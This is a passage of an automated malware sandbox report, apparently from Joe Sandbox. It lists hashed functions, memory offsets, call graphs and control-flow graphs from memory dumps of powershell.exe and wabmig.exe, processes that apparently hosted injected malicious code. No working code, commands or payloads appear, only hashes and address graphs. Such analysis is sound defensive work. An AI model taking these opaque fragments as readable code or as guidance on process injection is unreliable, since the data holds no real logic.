                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52a9808227ad4cb9f214f4b79bb17c78a0b1e75b31397b0da535b6cdc3fcd31e
                                                              • Instruction ID: 88a154125dc8a63f5704eb59794f025a2f676898d836e78ebcbdbdb595b040de
                                                              • Opcode Fuzzy Hash: 52a9808227ad4cb9f214f4b79bb17c78a0b1e75b31397b0da535b6cdc3fcd31e
                                                              • Instruction Fuzzy Hash: 6F11E030D4015CDBEF28EA94E5987ECB7B2AB4531DF18986AC011B61D0EB746A89CB15
                                                              Function 04A7D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207288874.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4a7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: feabe9ba1b2faac7e6f0784c9a23738e4aa9fde5df45ffb914a4a4ab7d565536
                                                              • Instruction ID: f4baec086e313bd0183f75272502bbf4b2899ecafee186e89da6ab9704a2ba96
                                                              • Opcode Fuzzy Hash: feabe9ba1b2faac7e6f0784c9a23738e4aa9fde5df45ffb914a4a4ab7d565536
                                                              • Instruction Fuzzy Hash: 4301F7715043049AFB304F21DCC0B67BF98DF41625F18C029DC0A0B542C678A442C7B1
                                                              Function 04A7D007 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207288874.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4a7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bc0d456190a3130fa2279c67c26a34bcda8824492ce66de932fb8d5ee3eee6c
                                                              • Instruction ID: 9f71a40def9f101ecb9a890eae2b55364056085dff95c5a9fcf76f0bc90cbe55
                                                              • Opcode Fuzzy Hash: 4bc0d456190a3130fa2279c67c26a34bcda8824492ce66de932fb8d5ee3eee6c
                                                              • Instruction Fuzzy Hash: 1A01717200E3C09FE7128B259C94B52BFB4DF43225F1D81DBD8888F1A3C2695849C7B2
                                                              Function 07751BAF Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 114bd15dced58f5de0cc615276ac63098c11fc876c60aaf34034da5a11604fc5
                                                              • Instruction ID: ac53ead9764e05a5003818fd4f420a6d115907d7532ee3ef05bba3cb258d129a
                                                              • Opcode Fuzzy Hash: 114bd15dced58f5de0cc615276ac63098c11fc876c60aaf34034da5a11604fc5
                                                              • Instruction Fuzzy Hash: 5BB012715051504FC241CB10C850480BF209F92104318C0CA94448B257CB23DE03C700

                                                              Non-executed Functions

                                                              Function 04A7D6E4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207288874.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4a7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d831bdce581d3d1a4062f84c5c4faf796b09dc24e8c5e776c29d6a84b201c7ac
                                                              • Instruction ID: a96c64541961d1a109fa188e873ae48acc5983dfcc03c99609f6e31f275bd4e4
                                                              • Opcode Fuzzy Hash: d831bdce581d3d1a4062f84c5c4faf796b09dc24e8c5e776c29d6a84b201c7ac
                                                              • Instruction Fuzzy Hash: 8D21FFB6604340EFDB24DF14DDC0B26BF65FF88324F24C669E8094B246C336E456CAA2

                                                              Execution Graph

                                                              Execution Coverage:20.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:141
                                                              Total number of Limit Nodes:1
                                                              execution_graph 17824 94e018 17825 94e024 17824->17825 17853 25d42915 17825->17853 17858 25d428e9 17825->17858 17863 25d42968 17825->17863 17868 25d428ed 17825->17868 17873 25d428e1 17825->17873 17878 25d428e5 17825->17878 17883 25d428f9 17825->17883 17888 25d428bd 17825->17888 17893 25d428fd 17825->17893 17898 25d428f1 17825->17898 17903 25d428f5 17825->17903 17908 25d428c9 17825->17908 17913 25d42909 17825->17913 17918 25d428cd 17825->17918 17923 25d4290d 17825->17923 17928 25d428c1 17825->17928 17933 25d42901 17825->17933 17938 25d428c5 17825->17938 17943 25d42905 17825->17943 17948 25d4295a 17825->17948 17953 25d428d9 17825->17953 17958 25d42919 17825->17958 17963 25d428dd 17825->17963 17968 25d428d1 17825->17968 17973 25d42911 17825->17973 17978 25d428d5 17825->17978 17826 94e0c3 17854 25d4291d 17853->17854 17855 25d42a56 17854->17855 17983 25d4992c 17854->17983 17987 25d49548 17854->17987 17855->17826 17859 25d4291d 17858->17859 17860 25d42a56 17859->17860 17861 25d4992c LdrInitializeThunk 17859->17861 17862 25d49548 2 API calls 17859->17862 17860->17826 17861->17860 17862->17860 17864 25d4298a 17863->17864 17865 25d42a56 17864->17865 17866 25d4992c LdrInitializeThunk 17864->17866 17867 25d49548 2 API calls 17864->17867 17865->17826 17866->17865 17867->17865 17869 25d4291d 17868->17869 17870 25d42a56 17869->17870 17871 25d4992c LdrInitializeThunk 17869->17871 17872 25d49548 2 API calls 17869->17872 17870->17826 17871->17870 17872->17870 17874 25d4291d 17873->17874 17875 25d42a56 17874->17875 17876 25d4992c LdrInitializeThunk 17874->17876 17877 25d49548 2 API calls 17874->17877 17875->17826 17876->17875 17877->17875 17880 25d4291d 17878->17880 17879 25d42a56 17879->17826 17880->17879 17881 25d4992c LdrInitializeThunk 17880->17881 17882 25d49548 2 API calls 17880->17882 17881->17879 17882->17879 17884 25d4291d 17883->17884 17885 25d42a56 17884->17885 17886 25d4992c LdrInitializeThunk 17884->17886 17887 25d49548 2 API calls 17884->17887 17885->17826 17886->17885 17887->17885 17889 25d4291d 17888->17889 17890 25d42a56 17889->17890 17891 25d4992c LdrInitializeThunk 17889->17891 17892 25d49548 2 API calls 17889->17892 17890->17826 17891->17890 17892->17890 17894 25d4291d 17893->17894 17895 25d42a56 17894->17895 17896 25d4992c LdrInitializeThunk 17894->17896 17897 25d49548 2 API calls 17894->17897 17895->17826 17896->17895 17897->17895 17899 25d4291d 17898->17899 17900 25d42a56 17899->17900 17901 25d4992c LdrInitializeThunk 17899->17901 17902 25d49548 2 API calls 17899->17902 17900->17826 17901->17900 17902->17900 17904 25d4291d 17903->17904 17905 25d42a56 17904->17905 17906 25d4992c LdrInitializeThunk 17904->17906 17907 25d49548 2 API calls 17904->17907 17905->17826 17906->17905 17907->17905 17910 25d4291d 17908->17910 17909 25d42a56 17909->17826 17910->17909 17911 25d4992c LdrInitializeThunk 17910->17911 17912 25d49548 2 API calls 17910->17912 17911->17909 17912->17909 17914 25d4291d 17913->17914 17915 25d42a56 17914->17915 17916 25d4992c LdrInitializeThunk 17914->17916 17917 25d49548 2 API calls 17914->17917 17915->17826 17916->17915 17917->17915 17919 25d4291d 17918->17919 17920 25d42a56 17919->17920 17921 25d4992c LdrInitializeThunk 17919->17921 17922 25d49548 2 API calls 17919->17922 17920->17826 17921->17920 17922->17920 17924 25d4291d 17923->17924 17925 25d42a56 17924->17925 17926 25d4992c LdrInitializeThunk 17924->17926 17927 25d49548 2 API calls 17924->17927 17925->17826 17926->17925 17927->17925 17929 25d4291d 17928->17929 17930 25d42a56 17929->17930 17931 25d4992c LdrInitializeThunk 17929->17931 17932 25d49548 2 API calls 17929->17932 17930->17826 17931->17930 17932->17930 17934 25d4291d 17933->17934 17935 25d42a56 17934->17935 17936 25d4992c LdrInitializeThunk 17934->17936 17937 25d49548 2 API calls 17934->17937 17935->17826 17936->17935 17937->17935 17940 25d4291d 17938->17940 17939 25d42a56 17939->17826 17940->17939 17941 25d4992c LdrInitializeThunk 17940->17941 17942 25d49548 2 API calls 17940->17942 17941->17939 17942->17939 17944 25d4291d 17943->17944 17945 25d42a56 17944->17945 17946 25d4992c LdrInitializeThunk 17944->17946 17947 25d49548 2 API calls 17944->17947 17945->17826 17946->17945 17947->17945 17952 25d42928 17948->17952 17949 25d42a56 17949->17826 17950 25d4992c LdrInitializeThunk 17950->17949 17951 25d49548 2 API calls 17951->17949 17952->17948 17952->17949 17952->17950 17952->17951 17954 25d4291d 17953->17954 17955 25d42a56 17954->17955 17956 25d4992c LdrInitializeThunk 17954->17956 17957 25d49548 2 API calls 17954->17957 17955->17826 17956->17955 17957->17955 17959 25d4291d 17958->17959 17960 25d42a56 17959->17960 17961 25d4992c LdrInitializeThunk 17959->17961 17962 25d49548 2 API calls 17959->17962 17960->17826 17961->17960 17962->17960 17965 25d4291d 17963->17965 17964 25d42a56 17964->17826 17965->17964 17966 25d4992c LdrInitializeThunk 17965->17966 17967 25d49548 2 API calls 17965->17967 17966->17964 17967->17964 17969 25d4291d 17968->17969 17970 25d42a56 17969->17970 17971 25d4992c LdrInitializeThunk 17969->17971 17972 25d49548 2 API calls 17969->17972 17970->17826 17971->17970 17972->17970 17974 25d4291d 17973->17974 17975 25d42a56 17974->17975 17976 25d4992c LdrInitializeThunk 17974->17976 17977 25d49548 2 API calls 17974->17977 17975->17826 17976->17975 17977->17975 17979 25d4291d 17978->17979 17980 25d42a56 17979->17980 17981 25d4992c LdrInitializeThunk 17979->17981 17982 25d49548 2 API calls 17979->17982 17980->17826 17981->17980 17982->17980 17986 25d497e3 17983->17986 17984 25d49a69 LdrInitializeThunk 17985 25d49a81 17984->17985 17985->17855 17986->17984 17988 25d4957e LdrInitializeThunk 17987->17988 17989 25d49579 17987->17989 17991 25d49619 17988->17991 17989->17988 17990 25d496d9 17990->17855 17991->17990 17992 25d49a69 LdrInitializeThunk 17991->17992 17992->17990

                                                              Executed Functions

                                                              Function 25D49548 Relevance: 3.4, APIs: 2, Instructions: 357libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 985 25d49548-25d49577 986 25d4957e-25d49614 LdrInitializeThunk 985->986 987 25d49579 985->987 988 25d496b3-25d496b9 986->988 987->986 989 25d496bf-25d496d7 988->989 990 25d49619-25d4962c 988->990 991 25d496d9-25d496e6 989->991 992 25d496eb-25d496fe 989->992 993 25d49633-25d49684 990->993 994 25d4962e 990->994 995 25d49a81-25d49b7e 991->995 996 25d49705-25d49721 992->996 997 25d49700 992->997 1011 25d49686-25d49694 993->1011 1012 25d49697-25d496a9 993->1012 994->993 1002 25d49b86-25d49b90 995->1002 1003 25d49b80-25d49b85 995->1003 999 25d49723 996->999 1000 25d49728-25d4974c 996->1000 997->996 999->1000 1006 25d49753-25d49785 1000->1006 1007 25d4974e 1000->1007 1003->1002 1016 25d49787 1006->1016 1017 25d4978c-25d497ce 1006->1017 1007->1006 1011->989 1013 25d496b0 1012->1013 1014 25d496ab 1012->1014 1013->988 1014->1013 1016->1017 1019 25d497d5-25d497de 1017->1019 1020 25d497d0 1017->1020 1021 25d49a06-25d49a0c 1019->1021 1020->1019 1022 25d49a12-25d49a25 1021->1022 1023 25d497e3-25d49808 1021->1023 1026 25d49a27 1022->1026 1027 25d49a2c-25d49a47 1022->1027 1024 25d4980f-25d49846 1023->1024 1025 25d4980a 1023->1025 1035 25d4984d-25d4987f 1024->1035 1036 25d49848 1024->1036 1025->1024 1026->1027 1028 25d49a4e-25d49a62 1027->1028 1029 25d49a49 1027->1029 1033 25d49a64 1028->1033 1034 25d49a69-25d49a7f LdrInitializeThunk 1028->1034 1029->1028 1033->1034 1034->995 1038 25d49881-25d498a6 1035->1038 1039 25d498e3-25d498f6 1035->1039 1036->1035 1042 25d498ad-25d498db 1038->1042 1043 25d498a8 1038->1043 1040 25d498fd-25d49922 1039->1040 1041 25d498f8 1039->1041 1046 25d49924-25d49925 1040->1046 1047 25d49931-25d49969 1040->1047 1041->1040 1042->1039 1043->1042 1046->1022 1048 25d49970-25d499d1 call 25d49328 1047->1048 1049 25d4996b 1047->1049 1055 25d499d3 1048->1055 1056 25d499d8-25d499fc 1048->1056 1049->1048 1055->1056 1059 25d49a03 1056->1059 1060 25d499fe 1056->1060 1059->1021 1060->1059
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ae1727ef07211577fac37e3782096c1d9c8202ba1e9d6b8ffae61e638a3a9a0
                                                              • Instruction ID: 5ad88de90dd7a2ed911dbb87056f663a1abb4cadd7e67e1fcedce30a3c2f5653
                                                              • Opcode Fuzzy Hash: 5ae1727ef07211577fac37e3782096c1d9c8202ba1e9d6b8ffae61e638a3a9a0
                                                              • Instruction Fuzzy Hash: 20F1C474E01218CFDB14DFA9C884B9DBBB6FF88304F1481A9E448AB355DB75A986CF50
                                                              Function 25D40B30 Relevance: 2.0, Strings: 1, Instructions: 709COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1061 25d40b30-25d40b50 1062 25d40b57-25d40bd9 1061->1062 1063 25d40b52 1061->1063 1065 25d40c3e-25d40c54 1062->1065 1063->1062 1066 25d40c56-25d40ca0 1065->1066 1067 25d40bdb-25d40be4 1065->1067 1074 25d40ca2-25d40ce3 1066->1074 1075 25d40d0b-25d40d0c 1066->1075 1068 25d40be6 1067->1068 1069 25d40beb-25d40c34 1067->1069 1068->1069 1076 25d40c36 1069->1076 1077 25d40c3b 1069->1077 1083 25d40d05-25d40d06 1074->1083 1084 25d40ce5-25d40d03 1074->1084 1078 25d40d0d-25d40d3e 1075->1078 1076->1077 1077->1065 1082 25d40d45-25d40dac 1078->1082 1090 25d40db2-25d40dd3 1082->1090 1091 25d416fe-25d41733 1082->1091 1085 25d40d07-25d40d09 1083->1085 1084->1085 1085->1078 1094 25d416db-25d416f7 1090->1094 1095 25d416fd 1094->1095 1096 25d40dd8-25d40de1 1094->1096 1095->1091 1097 25d40de3 1096->1097 1098 25d40de8-25d40e4e 1096->1098 1097->1098 1102 25d40e55-25d40edf 1098->1102 1103 25d40e50 1098->1103 1109 25d40ef1-25d40ef8 1102->1109 1110 25d40ee1-25d40ee8 1102->1110 1103->1102 1113 25d40eff-25d40f0c 1109->1113 1114 25d40efa 1109->1114 1111 25d40eef 1110->1111 1112 25d40eea 1110->1112 1111->1113 1112->1111 1115 25d40f13-25d40f1a 1113->1115 1116 25d40f0e 1113->1116 1114->1113 1117 25d40f21-25d40f78 1115->1117 1118 25d40f1c 1115->1118 1116->1115 1121 25d40f7f-25d40f96 1117->1121 1122 25d40f7a 1117->1122 1118->1117 1123 25d40fa1-25d40fa9 1121->1123 1124 25d40f98-25d40f9f 1121->1124 1122->1121 1125 25d40faa-25d40fb4 1123->1125 1124->1125 1126 25d40fb6 1125->1126 1127 25d40fbb-25d40fc4 1125->1127 1126->1127 1128 25d416ab-25d416b1 1127->1128 1129 25d416b7-25d416d1 1128->1129 1130 25d40fc9-25d40fd5 1128->1130 1138 25d416d3 1129->1138 1139 25d416d8 1129->1139 1131 25d40fd7 1130->1131 1132 25d40fdc-25d40fe1 1130->1132 1131->1132 1133 25d41024-25d41026 1132->1133 1134 25d40fe3-25d40fef 1132->1134 1140 25d4102c-25d41040 1133->1140 1136 25d40ff6-25d40ffb 1134->1136 1137 25d40ff1 1134->1137 1136->1133 1141 25d40ffd-25d4100a 1136->1141 1137->1136 1138->1139 1139->1094 1142 25d41046-25d4105b 1140->1142 1143 25d41689-25d41696 1140->1143 1144 25d41011-25d41022 1141->1144 1145 25d4100c 1141->1145 1146 25d41062-25d410e8 1142->1146 1147 25d4105d 1142->1147 1148 25d41697-25d416a1 1143->1148 1144->1140 1145->1144 1155 25d41112 1146->1155 1156 25d410ea-25d41110 1146->1156 1147->1146 1149 25d416a3 1148->1149 1150 25d416a8 1148->1150 1149->1150 1150->1128 1157 25d4111c-25d4113c 1155->1157 1156->1157 1159 25d41142-25d4114c 1157->1159 1160 25d412bb-25d412c0 1157->1160 1161 25d41153-25d4117c 1159->1161 1162 25d4114e 1159->1162 1163 25d41324-25d41326 1160->1163 1164 25d412c2-25d412e2 1160->1164 1165 25d41196-25d41198 1161->1165 1166 25d4117e-25d41188 1161->1166 1162->1161 1167 25d4132c-25d4134c 1163->1167 1174 25d412e4-25d4130a 1164->1174 1175 25d4130c 1164->1175 1171 25d41237-25d41246 1165->1171 1169 25d4118f-25d41195 1166->1169 1170 25d4118a 1166->1170 1172 25d41352-25d4135c 1167->1172 1173 25d41683-25d41684 1167->1173 1169->1165 1170->1169 1176 25d4124d-25d41252 1171->1176 1177 25d41248 1171->1177 1178 25d41363-25d4138c 1172->1178 1179 25d4135e 1172->1179 1180 25d41685-25d41687 1173->1180 1181 25d41316-25d41322 1174->1181 1175->1181 1182 25d41254-25d41264 1176->1182 1183 25d4127c-25d4127e 1176->1183 1177->1176 1184 25d413a6-25d413b4 1178->1184 1185 25d4138e-25d41398 1178->1185 1179->1178 1180->1148 1181->1167 1188 25d41266 1182->1188 1189 25d4126b-25d4127a 1182->1189 1190 25d41284-25d41298 1183->1190 1186 25d41453-25d41462 1184->1186 1191 25d4139f-25d413a5 1185->1191 1192 25d4139a 1185->1192 1195 25d41464 1186->1195 1196 25d41469-25d4146e 1186->1196 1188->1189 1189->1190 1193 25d4119d-25d411b8 1190->1193 1194 25d4129e-25d412b6 1190->1194 1191->1184 1192->1191 1199 25d411bf-25d41229 1193->1199 1200 25d411ba 1193->1200 1194->1180 1195->1196 1197 25d41470-25d41480 1196->1197 1198 25d41498-25d4149a 1196->1198 1201 25d41487-25d41496 1197->1201 1202 25d41482 1197->1202 1203 25d414a0-25d414b4 1198->1203 1217 25d41230-25d41236 1199->1217 1218 25d4122b 1199->1218 1200->1199 1201->1203 1202->1201 1204 25d413b9-25d413d4 1203->1204 1205 25d414ba-25d41523 1203->1205 1207 25d413d6 1204->1207 1208 25d413db-25d41445 1204->1208 1215 25d41525-25d41527 1205->1215 1216 25d4152c-25d4167f 1205->1216 1207->1208 1222 25d41447 1208->1222 1223 25d4144c-25d41452 1208->1223 1219 25d41680-25d41681 1215->1219 1216->1219 1217->1171 1218->1217 1219->1129 1222->1223 1223->1186
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: j"
                                                              • API String ID: 0-1479328248
                                                              • Opcode ID: cf41928d5a1945eab707f07f799798b02e0cef7a0515a0323ca92f147922de8f
                                                              • Instruction ID: ca642c17bdd2d8d4d7ca3538315dc23ef4726e41434c41f72f9d1b5aa6d817df
                                                              • Opcode Fuzzy Hash: cf41928d5a1945eab707f07f799798b02e0cef7a0515a0323ca92f147922de8f
                                                              • Instruction Fuzzy Hash: CE72AE75E052298FDB64DF69C980BE9BBF2BB89300F1481E9D449A7351DB34AE81CF50
                                                              Function 009469A0 Relevance: .5, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17829a40e99c388587c61fa755bf2531acd4cf0cc7636a5ebd6fae9bf5ddeb70
                                                              • Instruction ID: e71c998d0a13e2ddec50d4fb148bd1047964b4393139c981165533fe743788f8
                                                              • Opcode Fuzzy Hash: 17829a40e99c388587c61fa755bf2531acd4cf0cc7636a5ebd6fae9bf5ddeb70
                                                              • Instruction Fuzzy Hash: A1126D70B002199FDB15DF69C854BAEBBF6BF89300F208569E806EB395DB349D41CB91
                                                              Function 00946FC8 Relevance: .4, Instructions: 450COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2970 946fc8-946ffe 2971 947006-94700c 2970->2971 3098 947000 call 9469a0 2970->3098 3099 947000 call 947118 2970->3099 3100 947000 call 946fc8 2970->3100 2972 94705c-947060 2971->2972 2973 94700e-947012 2971->2973 2974 947077-94708b 2972->2974 2975 947062-947071 2972->2975 2976 947014-947019 2973->2976 2977 947021-947028 2973->2977 2980 947093-94709a 2974->2980 3101 94708d call 94a0f3 2974->3101 3102 94708d call 94a0f8 2974->3102 2978 947073-947075 2975->2978 2979 94709d-9470a7 2975->2979 2976->2977 2981 9470fe-94713b 2977->2981 2982 94702e-947035 2977->2982 2978->2980 2983 9470b1-9470b5 2979->2983 2984 9470a9-9470af 2979->2984 2992 947146-947166 2981->2992 2993 94713d-947143 2981->2993 2982->2972 2985 947037-94703b 2982->2985 2986 9470bd-9470f7 2983->2986 2988 9470b7 2983->2988 2984->2986 2989 94703d-947042 2985->2989 2990 94704a-947051 2985->2990 2986->2981 2988->2986 2989->2990 2990->2981 2991 947057-94705a 2990->2991 2991->2980 2998 94716d-947174 2992->2998 2999 947168 2992->2999 2993->2992 3001 947176-947181 2998->3001 3002 9474fc-947505 2999->3002 3003 947187-94719a 3001->3003 3004 94750d-947519 3001->3004 3009 9471b0-9471cb 3003->3009 3010 94719c-9471aa 3003->3010 3011 9474af-9474b2 3004->3011 3012 94751b-947521 3004->3012 3023 9471cd-9471d3 3009->3023 3024 9471ef-9471f2 3009->3024 3010->3009 3022 947484-94748b 3010->3022 3013 9474b4 3011->3013 3014 947508 3011->3014 3015 9474b7-9474b9 3012->3015 3016 947523-94752f 3012->3016 3017 9474bb-9474c0 3013->3017 3014->3004 3015->3014 3015->3017 3020 9474e2-9474e4 3017->3020 3021 9474c2-9474c4 3017->3021 3020->3014 3026 9474e6-9474e9 3020->3026 3029 9474c6-9474cb 3021->3029 3030 9474d3-9474d9 3021->3030 3022->3002 3025 94748d-94748f 3022->3025 3031 9471d5 3023->3031 3032 9471dc-9471df 3023->3032 3027 94734c-947352 3024->3027 3028 9471f8-9471fb 3024->3028 3035 947491-947496 3025->3035 3036 94749e-9474a4 3025->3036 3044 9474f0-9474f3 3026->3044 3034 94743e-947441 3027->3034 3038 947358-94735d 3027->3038 3028->3027 3039 947201-947207 3028->3039 3029->3030 3030->3004 3040 9474db-9474e0 3030->3040 3031->3027 3031->3032 3033 947212-947218 3031->3033 3031->3034 3032->3033 3037 9471e1-9471e4 3032->3037 3047 94721e-947220 3033->3047 3048 94721a-94721c 3033->3048 3034->3014 3049 947447-94744d 3034->3049 3035->3036 3036->3004 3045 9474a6-9474ab 3036->3045 3042 94727e-947284 3037->3042 3043 9471ea 3037->3043 3038->3034 3039->3027 3046 94720d 3039->3046 3040->3020 3041 9474b6 3040->3041 3041->3015 3042->3034 3052 94728a-947290 3042->3052 3043->3034 3044->3014 3050 9474f5-9474fa 3044->3050 3045->3044 3051 9474ad 3045->3051 3046->3034 3053 94722a-947233 3047->3053 3048->3053 3054 947472-947476 3049->3054 3055 94744f-947457 3049->3055 3050->3002 3050->3025 3051->3011 3056 947296-947298 3052->3056 3057 947292-947294 3052->3057 3059 947235-947240 3053->3059 3060 947246-94726e 3053->3060 3054->3022 3061 947478-94747e 3054->3061 3055->3004 3058 94745d-94746c 3055->3058 3062 9472a2-9472b9 3056->3062 3057->3062 3058->3009 3058->3054 3059->3034 3059->3060 3073 947274-947279 3060->3073 3074 947362-947398 3060->3074 3061->3001 3061->3022 3068 9472e4-94730b 3062->3068 3069 9472bb-9472d4 3062->3069 3068->3014 3079 947311-947314 3068->3079 3069->3074 3077 9472da-9472df 3069->3077 3073->3074 3080 9473a5-9473ad 3074->3080 3081 94739a-94739e 3074->3081 3077->3074 3079->3014 3082 94731a-947343 3079->3082 3080->3014 3085 9473b3-9473b8 3080->3085 3083 9473a0-9473a3 3081->3083 3084 9473bd-9473c1 3081->3084 3082->3074 3097 947345-94734a 3082->3097 3083->3080 3083->3084 3086 9473e0-9473e4 3084->3086 3087 9473c3-9473c9 3084->3087 3085->3034 3089 9473e6-9473ec 3086->3089 3090 9473ee-94740d call 94791d 3086->3090 3087->3086 3091 9473cb-9473d3 3087->3091 3089->3090 3092 947413-947417 3089->3092 3090->3092 3091->3014 3093 9473d9-9473de 3091->3093 3092->3034 3095 947419-947435 3092->3095 3093->3034 3095->3034 3097->3074 3098->2971 3099->2971 3100->2971 3101->2980 3102->2980
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c251291c4828b844d2212e58edf5e1900ea92cb164d4a5f788c6e85931e2cb15
                                                              • Instruction ID: cdb0941564c5c17f97cd0d8a7f33d41cac83b1659a4361841d5dea395028e345
                                                              • Opcode Fuzzy Hash: c251291c4828b844d2212e58edf5e1900ea92cb164d4a5f788c6e85931e2cb15
                                                              • Instruction Fuzzy Hash: 30025D30A08259DFCB15CFA8C984EAEFBB6BF89304F158469E815AB361D735ED41CB50
                                                              Function 00943E13 Relevance: .4, Instructions: 430COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3104 943e13-943e25 3105 943e27-943e29 3104->3105 3106 943e2e-943e3e 3104->3106 3107 9440cc-9440d3 3105->3107 3108 943e45-943e55 3106->3108 3109 943e40 3106->3109 3111 9440b3-9440c1 3108->3111 3112 943e5b-943e69 3108->3112 3109->3107 3115 9440d4-9441ba 3111->3115 3116 9440c3-9440c7 call 9402c8 3111->3116 3112->3115 3117 943e6f 3112->3117 3186 9441c1-9442c9 call 942358 call 942368 call 942378 call 942388 call 9402e4 3115->3186 3187 9441bc 3115->3187 3116->3107 3117->3115 3119 943e76-943e88 3117->3119 3120 943f72-943f9a 3117->3120 3121 943eb3-943ed5 3117->3121 3122 943f9f-943fc7 3117->3122 3123 944039-944065 3117->3123 3124 943eda-943efb 3117->3124 3125 944084-9440a5 call 9428f0 3117->3125 3126 943f26-943f47 3117->3126 3127 944067-944082 call 9402d8 3117->3127 3128 9440a7-9440b1 3117->3128 3129 943f00-943f21 3117->3129 3130 943f4c-943f6d 3117->3130 3131 943fcc-944009 3117->3131 3132 943e8d-943eae 3117->3132 3133 94400e-944034 3117->3133 3119->3107 3120->3107 3121->3107 3122->3107 3123->3107 3124->3107 3125->3107 3126->3107 3127->3107 3128->3107 3129->3107 3130->3107 3131->3107 3132->3107 3133->3107 3205 9442cf-94435f 3186->3205 3187->3186
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a64d478e5d50692d26446b4b8b72746110ba99887c51b45e1567a610c596a559
                                                              • Instruction ID: 443e35a54788ffe7f5f3ac82f536dbf375c2bc2721ebafd44feb11954b4a8f87
                                                              • Opcode Fuzzy Hash: a64d478e5d50692d26446b4b8b72746110ba99887c51b45e1567a610c596a559
                                                              • Instruction Fuzzy Hash: 79F16F34F08219CFDB18DFB5C854AAEBBB2BFC9700B148569E406E7395DB359802DB51
                                                              Function 25D42968 Relevance: .3, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76f91d06b359606dc1591474731b9d4731c6a587ccece2f5994d1851c8abd827
                                                              • Instruction ID: 7ba0662fbb83d7f5b1df469e5e1853ed8394c6908322e7e1625990d071701e7b
                                                              • Opcode Fuzzy Hash: 76f91d06b359606dc1591474731b9d4731c6a587ccece2f5994d1851c8abd827
